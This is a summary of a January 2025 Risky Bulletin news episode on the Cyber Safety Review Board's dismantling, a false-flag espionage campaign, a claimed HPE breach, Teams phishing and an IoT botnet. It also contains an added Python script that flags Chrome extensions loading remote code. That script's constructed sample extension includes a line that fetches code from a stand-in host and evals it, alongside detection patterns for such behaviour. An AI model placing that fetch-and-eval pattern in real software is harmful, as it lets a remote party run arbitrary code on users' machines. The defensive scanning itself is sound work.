Risky Bulletin: Trump Guts the Cyber Safety Review Board
Hosted by risky.biz | Release Date: January 21, 2025
Introduction
In this episode of Risky Bulletin, host Claire Aird covers significant developments in the cybersecurity landscape, including political shifts, emerging threats, and notable security breaches. Prepared by Catalin Cimpanu, this edition covers the Trump administration's dismantling of the Cyber Safety Review Board, a cyber espionage campaign that imitates the FSB, an alleged breach at a major tech firm, malicious Chrome extensions, phishing campaigns that abuse Microsoft Teams, and the emergence of a sizable IoT botnet.
1. President Trump Dismantles the Cyber Safety Review Board
Claire Aird opens the discussion with a major policy shift:
"[...] the Trump administration has removed all non-government members from all DHS committees, including the Cyber Safety Review Board." [00:20]
The Cyber Safety Review Board (CSRB), established in February 2022 as a 14-member panel, previously included prominent private sector figures such as Google's Heather Adkins, CrowdStrike co-founder Dmitri Alperovitch, former NSA cybersecurity director Rob Joyce, and CISA's founding director Chris Krebs. Removing these members marks a substantial retreat from public-private collaboration in cybersecurity oversight.
President Trump has also rescinded an executive order issued by President Biden in 2023, which required large AI companies to rigorously test their models to guard against significant societal risks. The reversal also entails the shutdown of the US AI Safety Institute, a move that critics argue weakens safeguards against the misuse of artificial intelligence.
2. GamaCopy Impersonates the FSB to Target Russian Organizations
A cyber espionage campaign has emerged in which a threat actor tracked as GamaCopy impersonates Russia's Federal Security Service (FSB) to target Russian entities. Claire notes:
"A cyber espionage group has been imitating the FSB's TTPs to target Russian organisations." [00:45]
GamaCopy mimics the tactics, techniques, and procedures (TTPs) of Gamaredon, a known FSB-affiliated cyber espionage group operating out of Crimea. Since June, these false-flag attacks have led security vendors to misattribute incidents to Gamaredon, according to Chinese security firm Knownsec 404. The spearphishing campaigns use military-themed lures aimed at individuals in Russia's defense and critical infrastructure sectors. Victims are tricked into downloading malicious 7-Zip archives, which give the attackers unauthorized access and enable data theft.
3. HPE Investigates Alleged Data Breach by IntelBroker
High-performance computing giant HPE is currently probing a potential security breach:
"American tech giant HPE is investigating a possible security breach after a threat actor started advertising data allegedly stolen from its servers." [01:10]
The hacker, known as IntelBroker, claims to have exfiltrated old user data and source code associated with HPE's Zerto and iLO products. IntelBroker was also behind the breach of Cisco's DevHub portal in late 2024, indicating a pattern of attacks against major technology firms.
4. Discovery of Malicious Chrome Extensions Bypassing Google's Security
Security researcher Wladimir Palant has uncovered a troubling trend in browser security:
"Security researcher Wladimir Palant has discovered 35 Chrome extensions that circumvent Google's restrictions and retrieve and execute code from remote servers." [01:35]
These extensions masquerade as legitimate VPN and ad-blocking tools but are in reality designed to spy on users and commit affiliate link fraud. Disturbingly, all 35 malicious extensions remain available on the official Chrome Web Store, leaving unsuspecting users exposed.
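The defining trait of the extensions described above is that they fetch code from a remote server and execute it, which the Chrome Web Store rules forbid. The following is an added example, not Palant's tooling or anything from the episode: a small static triage script that scans an unpacked extension directory for remote-code-loading indicators (eval, new Function, a fetch or XMLHttpRequest pointed at an external URL, script-tag injection, or a manifest CSP that permits remote scripts) and assigns a rough risk level. The indicator regexes, the risk thresholds and the two sample extensions it writes to a temporary directory are all constructed for this example.

```python
import json
import re
import tempfile
from pathlib import Path

# Heuristic indicators of remote code loading (chosen for this example;
# a real review would also read the code, not just grep it).
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "new_function": re.compile(r"\bnew\s+Function\s*\("),
    # fetch(...)/XMLHttpRequest/importScripts followed within 120 chars by an http(s) URL
    "remote_fetch": re.compile(
        r"\b(?:fetch|XMLHttpRequest|importScripts)\b[\s\S]{0,120}?https?://"),
    "script_injection": re.compile(r"createElement\s*\(\s*['\"]script['\"]"),
}


def scan_extension(ext_dir):
    """Return a list of (relative_file, indicator_name) findings for one unpacked extension."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    findings = []

    # MV3 stores the CSP as an object; MV2 stored it as a plain string.
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):
        csp = csp.get("extension_pages", "")
    if "http" in csp or "unsafe-eval" in csp:
        findings.append(("manifest.json", "csp_permits_remote_or_eval"))

    for js_file in sorted(ext_dir.rglob("*.js")):
        source = js_file.read_text(encoding="utf-8", errors="replace")
        for name, pattern in INDICATORS.items():
            if pattern.search(source):
                findings.append((js_file.relative_to(ext_dir).as_posix(), name))
    return findings


def risk_score(findings):
    """'high' when code is both fetched remotely and executed dynamically."""
    names = {name for _, name in findings}
    executes = bool(names & {"eval", "new_function", "script_injection"})
    remote = bool(names & {"remote_fetch", "csp_permits_remote_or_eval"})
    if executes and remote:
        return "high"
    if executes or remote:
        return "medium"
    return "low"


def build_samples(root):
    """Write two constructed extensions under root; the hostnames are not real."""
    root = Path(root)
    bad = root / "suspicious-vpn"
    bad.mkdir(parents=True, exist_ok=True)
    (bad / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Free VPN (constructed sample)",
        "version": "1.0", "background": {"service_worker": "background.js"}}))
    (bad / "background.js").write_text(
        '// Pulls a script body from a remote host and runs it.\n'
        'fetch("https://updates.example.invalid/rules.js")\n'
        '  .then((r) => r.text())\n'
        '  .then((code) => eval(code));\n')

    good = root / "benign-notes"
    good.mkdir(parents=True, exist_ok=True)
    (good / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Notes (constructed sample)",
        "version": "1.0", "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]}))
    (good / "content.js").write_text(
        'chrome.storage.local.get("notes", (items) => {\n'
        '  document.querySelectorAll("a").forEach((a) => a.classList.add("noted"));\n'
        '});\n')
    return [bad, good]


def demo():
    """Scan the two constructed samples and return {extension_name: risk_level}."""
    with tempfile.TemporaryDirectory() as tmp:
        return {d.name: risk_score(scan_extension(d)) for d in build_samples(tmp)}


if __name__ == "__main__":
    for name, level in demo().items():
        print(f"{name}: {level}")
```

Run it against a real unpacked extension with `scan_extension("/path/to/extension")`; a "high" result is a reason to read the flagged files, not proof of malice, since legitimate extensions occasionally load remote data and some malicious ones hide the URL in obfuscated strings this heuristic will miss.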
5. Exploitation of Microsoft Teams for Phishing Attacks
Cybercriminals are abusing Microsoft Teams to conduct targeted phishing campaigns:
"Threat actors are spamming workers at large corporations and then contacting the victim posing as their IT help desk." [01:55]
By taking advantage of misconfigurations in the Teams platform, attackers can call or message employees directly inside private workspaces, a technique first used last year by the Black Basta ransomware crew. The method has since spread to other threat groups, including FIN7, increasing the reach and effectiveness of these phishing operations.
6. Emergence of the Murdoc IoT Botnet Launching Large-Scale DDoS Attacks
Qualys has identified a new Internet of Things (IoT) botnet named Murdoc that is carrying out extensive Distributed Denial of Service (DDoS) attacks:
"Qualys has identified a new IoT botnet that's carrying out large scale DDoS attacks. Named Murdoc, the botnet began operating in July of last year." [02:15]
The botnet exploits unpatched vulnerabilities in AVTech cameras and Huawei routers, relying on flaws that are publicly documented. Murdoc currently runs on approximately 1,000 devices, posing a significant threat to the stability of internet infrastructure.
Conclusion
Claire Aird wraps up the episode by noting that President Trump's dominance of the current news cycle kept this edition short:
"Just a short one today with Donald Trump absolutely dominating the news cycle. But we'll be back with more news in a couple of days when the agenda, well, hopefully goes back to business as usual." [02:40]
Listeners are assured of more comprehensive updates in future editions of the Risky Bulletin.
Sponsor
This episode of Risky Bulletin is sponsored by Resourcely, a company specializing in secure Terraform management. Discover more at resourcely.io.
Thank you for tuning in to Risky Bulletin. Stay informed and stay secure.
